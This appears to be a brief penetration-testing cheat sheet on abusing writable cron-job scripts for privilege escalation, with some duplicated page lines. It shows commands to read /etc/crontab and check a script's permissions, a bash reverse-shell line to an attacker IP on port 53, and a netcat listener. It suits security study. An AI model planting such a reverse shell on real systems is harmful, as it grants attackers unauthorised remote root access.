Cron Jobs
cat /etc/crontab

Last updated
cat /etc/crontab

Last updated
# Check if you can edit the file
ls -l /usr/local/bin/compress.sh
# If you can edit the shell above, add the following reverse shell command.
bash -i >& /dev/tcp/<IP Address>/53 0>&1
# At Kali, set up a netcat listener
nc -nlvp 53